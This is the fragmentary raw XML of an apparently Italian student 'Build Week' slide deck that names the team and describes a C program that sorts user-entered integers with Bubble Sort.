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 id="272" r:id="rId36"/>
    <p:sldId id="273" r:id="rId37"/>
    <p:sldId id="274" r:id="rId38"/>
    <p:sldId id="275" r:id="rId39"/>
    <p:sldId id="276" r:id="rId40"/>
    <p:sldId id="277" r:id="rId41"/>
    <p:sldId id="278" r:id="rId42"/>
    <p:sldId id="279" r:id="rId43"/>
    <p:sldId id="280" r:id="rId44"/>
    <p:sldId id="281" r:id="rId45"/>
    <p:sldId id="282" r:id="rId46"/>
    <p:sldId id="283" r:id="rId47"/>
    <p:sldId id="284" r:id="rId48"/>
    <p:sldId id="285" r:id="rId49"/>
    <p:sldId id="286" r:id="rId50"/>
    <p:sldId id="287" r:id="rId51"/>
    <p:sldId id="288" r:id="rId52"/>
    <p:sldId id="289" r:id="rId53"/>
    <p:sldId id="290" r:id="rId54"/>
    <p:sldId id="291" r:id="rId5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K Grotesk" charset="1" panose="00000500000000000000"/>
      <p:regular r:id="rId10"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HK Grotesk Bold" charset="1" panose="00000800000000000000"/>
      <p:regular r:id="rId11"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HK Grotesk Italics" charset="1" panose="00000500000000000000"/>
      <p:regular r:id="rId12"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HK Grotesk Bold Italics" charset="1" panose="00000800000000000000"/>
      <p:regular r:id="rId13"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HK Grotesk Light" charset="1" panose="00000400000000000000"/>
      <p:regular r:id="rId14"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HK Grotesk Light Italics" charset="1" panose="00000400000000000000"/>
      <p:regular r:id="rId15"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HK Grotesk Medium" charset="1" panose="00000600000000000000"/>
      <p:regular r:id="rId16"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HK Grotesk Medium Italics" charset="1" panose="00000600000000000000"/>
      <p:regular r:id="rId17"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HK Grotesk Semi-Bold" charset="1" panose="00000700000000000000"/>
      <p:regular r:id="rId18"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HK Grotesk Semi-Bold Italics" charset="1" panose="000007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33" Target="slides/slide14.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId34" Target="slides/slide15.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId35" Target="slides/slide16.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId36" Target="slides/slide17.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId37" Target="slides/slide18.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId38" Target="slides/slide19.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId39" Target="slides/slide20.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId4" Target="theme/theme1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme"/><Relationship Id="rId40" Target="slides/slide21.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId41" Target="slides/slide22.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId42" Target="slides/slide23.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId43" Target="slides/slide24.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId44" Target="slides/slide25.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId45" Target="slides/slide26.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId46" Target="slides/slide27.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId47" Target="slides/slide28.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId48" Target="slides/slide29.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId49" Target="slides/slide30.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId5" Target="tableStyles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles"/><Relationship Id="rId50" Target="slides/slide31.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId51" Target="slides/slide32.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId52" Target="slides/slide33.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId53" Target="slides/slide34.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId54" Target="slides/slide35.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId55" Target="slides/slide36.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svg>
</file>

<file path=ppt/media/image5.sv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3.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4.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5.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6.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7.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8.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9.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0.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2.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3.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4.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5.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image26.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7.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8.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9.pn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0.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image31.pn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2.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image33.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image3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5.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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6.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image37.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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8.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image39.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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40.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image41.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image42.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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43.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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4.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId3" Target="../media/image45.svg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId4"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9.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2.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1914912">
            <a:off x="-1534103" y="1801518"/>
            <a:ext cx="21356206" cy="6874465"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6874465" w="21356206">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21356206" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21356206" y="6874464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="68744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28700" y="685223"/>
            <a:ext cx="12943670" cy="5562617"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="17258227" cy="7416823"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="104775"/>
              <a:ext cx="17258227" cy="2530288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="14430"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="13000" spc="-390">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>Build Week</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 5" id="5"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3208805"/>
              <a:ext cx="9679494" cy="4208018"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3552"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3200" u="sng">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Light Italics"/>
                </a:rPr>
                <a:t>TEAM LEADER</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Light"/>
                </a:rPr>
                <a:t>: ALESSIO GOLFETTO</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3552"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3552"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3200" u="sng">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Light Italics"/>
                </a:rPr>
                <a:t>TEAM MEMBERS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Light"/>
                </a:rPr>
                <a:t>:SARA HIZDER</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3552"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Light"/>
                </a:rPr>
                <a:t>MATTIA PASTORELLI</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3552"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Light"/>
                </a:rPr>
                <a:t>GABRIEL GOLDY</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3552"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Light"/>
                </a:rPr>
                <a:t>GERARDO CARRABS</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3552"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3200">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Light"/>
                </a:rPr>
                <a:t>MATTIA CHIRIATTI</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10342698" y="7413044"/>
            <a:ext cx="7173476" cy="2038495"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1889310" cy="536888"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1889310" cy="536888"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="536888" w="1889310">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1889310" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889310" y="536888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="536888"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="1889310" cy="517838"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 9" id="9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10493081" y="7691690"/>
            <a:ext cx="6766219" cy="1566610"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1566610" w="6766219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6766219" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6766219" y="1566610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1566610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>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383058" y="1028700"/>
            <a:ext cx="3609209" cy="9105051"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9105051" w="3609209">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3609209" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3609209" y="9105051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9105051"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1816863" y="1219517"/>
            <a:ext cx="9191257" cy="778129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Analizzandolo a monte, il programma è scritto in linguaggio C.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Lo stesso chiede l’inserimento di alcuni valori interi all’utente che, di conseguenza, formeranno un array chiamato vettore e li stamperà a schermo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Tramite un algoritmo chiamato Bubble Sort, il programma ordinerà gli elementi del vettore in ordine ascendente, comparando e scambiando gli stessi in caso in cui fossero in un ordine scorretto. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Poi, provvederà a stamparli nuovamente a schermo nell’ordine corretto.</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954253" y="2719705"/>
            <a:ext cx="9191257" cy="47809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Come da immagine a destra, il programma fa esattamente quanto descritto nella slide precedente:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>abbiamo inserito 10 valori interi (da 0 a 9) in ordine sparso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Il programma ha poi riordinato i valori. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="13169474" y="1286192"/>
            <a:ext cx="2957706" cy="8589502"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8589502" w="2957706">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2957706" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2957706" y="8589503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8589503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13169474" y="1286192"/>
            <a:ext cx="2549513" cy="2845666"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="671477" cy="749476"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="671477" cy="749476"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="749476" w="671477">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="671477" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671477" y="749476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="749476"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 7" id="7"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="671477" cy="730426"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13169474" y="6900545"/>
            <a:ext cx="2957706" cy="2975150"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="778984" cy="783579"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 10" id="10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="778984" cy="783579"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="783579" w="778984">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="778984" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778984" y="783579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="783579"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="778984" cy="764529"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 12" id="12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="true">
            <a:off x="11145510" y="3884045"/>
            <a:ext cx="1723069" cy="1259455"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="38100">
            <a:solidFill>
              <a:srgbClr val="FF3131"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="arrow" len="sm" w="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 13" id="13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10813612" y="7518830"/>
            <a:ext cx="2049373" cy="629668"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="38100">
            <a:solidFill>
              <a:srgbClr val="FF3131"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="arrow" len="sm" w="med"/>
          </a:ln>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238388" y="1234416"/>
            <a:ext cx="6763305" cy="8745155"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8745155" w="6763305">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6763304" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6763304" y="8745155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8745155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 4" id="4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10238388" y="7700672"/>
            <a:ext cx="3086100" cy="492849"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="129804"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 5" id="5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="812800" cy="129804"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="129804" w="812800">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
